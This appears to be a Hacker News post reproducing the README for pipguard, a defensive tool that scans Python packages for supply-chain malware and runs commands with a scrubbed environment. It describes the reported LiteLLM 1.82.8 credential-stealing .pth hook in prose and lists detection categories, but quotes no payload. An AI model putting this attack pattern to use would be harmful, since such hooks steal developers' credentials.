HN 표시: Pipguard – Python 공급망 공격을 위한 사전 설치 악성코드 스캐너

Scan Python packages for supply-chain malware before install. Reduce blast radius when running untrusted tools. pipguard is a local-only, zero-dependency Python CLI that catches obvious supply-chain attacks — executable .pth files, import-time exfiltration, credential harvesting, obfuscated payloads — before they reach your environment. Maintained & managed by AtomsAI.com (x.com/ai_atoms). Recent supply-chain incidents (PyPI typosquatting, compromised maintainer accounts, malicious startup hooks) have shown that pip install is an implicit trust decision. pipguard adds a verification step between download and install, and provides tools to audit and contain blast radius in your development environment. The LiteLLM PyPI release 1.82.8 became a high-visibility example of why pre-install package scanning matters. The reported behavior was not just a dependency hygiene issue or a known CVE. It was a live supply-chain compromise pattern: startup-hook execution, credential discovery, and outbound data theft. Community reports described the release as containing a malicious litellm_init.pth startup hook with base64-encoded instructions designed to collect credentials and exfiltrate them to a remote server. "LiteLLM HAS BEEN COMPROMISED, DO NOT UPDATE. We just discovered that LiteLLM pypi release 1.82.8. It has been compromised, it contains litellm_init.pth with base64 encoded instructions to send all the credentials it can find to remote server + self-replicate." Source: Daniel Hnyk (tweet) Why this matters: .pth files execute automatically during Python startup, which means damage can happen before a developer notices anything unusual.- Credential theft targets the exact materials most AI and infra-heavy Python environments carry: API keys, cloud credentials, SSH material, shell history, and cluster configuration. - A compromised package can affect both install-time trust and runtime blast radius, which is why pipguard includes both package scanning and environment containment commands. Public discussion and incident context: - Daniel Hnyk warning about the compromised LiteLLM 1.82.8 release: x.com/hnykda/status/2036414330267193815 - Broader public discussion from Andrej Karpathy: x.com/karpathy/status/2036487306585268612 pipguard is designed specifically for this class of attack: suspicious startup hooks, obfuscated payloads, environment enumeration, sensitive path reads, IOC matches, and source-to-sink exfiltration chains. | Command | Purpose | |---|---| pipguard scan | Scan a wheel, sdist, or directory for malware patterns | pipguard install | Download → scan → install (blocks if malicious) | pipguard doctor | Inspect your current Python environment for compromise | pipguard env-audit | Show credential exposure in your current shell | pipguard run -- | Launch a command with a scrubbed environment | python3 -m pip install -e ".[dev]" One-line runner options: uvx --from git+https://github.com/atomsai/pipguard.git pipguard --help pipx install git+https://github.com/atomsai/pipguard.git pipguard --help Or just clone and run directly: git clone https://github.com/AtomsAI/pipguard.git cd pipguard python3 -m pipguard --help macOS note: many systems do not provide python by default. Preferpython3 in commands. pipguard scan ./downloaded-package/ pipguard scan package-1.0-py3-none-any.whl pipguard install requests pipguard install "litellm==4.97.1" --policy block pipguard install some-package --json-out report.json pipguard doctor pipguard doctor --ioc litellm-march-2026 pipguard doctor --json-out doctor-report.json pipguard env-audit pipguard env-audit --json-out audit.json # Default: only PATH, HOME, LANG, TERM inherited pipguard run -- python3 my_script.py # Allow specific env vars pipguard run --allow-env OPENAI_API_KEY -- python3 agent.py # Use a named profile pipguard run --profile claude-code -- claude # See what would be inherited/blocked pipguard run --dry-run -- node server.js # Strict mode (only PATH and HOME) pipguard run --strict --allow-env ANTHROPIC_API_KEY -- python3 agent.py # Pre-install scan (local artifact or folder) pipguard scan ./dist/pkg-1.0.0-py3-none-any.whl # Safe install wrapper (download -> scan -> local-only install) pipguard install "requests>=2.31" # Incident triage in current environment pipguard doctor --ioc litellm-march-2026 # Exposure audit of current shell pipguard env-audit # Run tool with minimal env inheritance pipguard run --allow-env OPENAI_API_KEY -- python3 app.py # Dry-run to preview inherited vs blocked vars pipguard run --profile mcp-server --dry-run -- my_mcp_server # --- Remove pipguard --- # If installed with pip: python3 -m pip uninstall pipguard # If installed with pipx: pipx uninstall pipguard # If used via uvx (ephemeral), no uninstall is required. - Install pipguard outside project virtualenvs (preferpipx oruvx ) so dependency code in a project env cannot directly uninstall it. - Run uninstall commands only from a trusted interactive shell, never from package-provid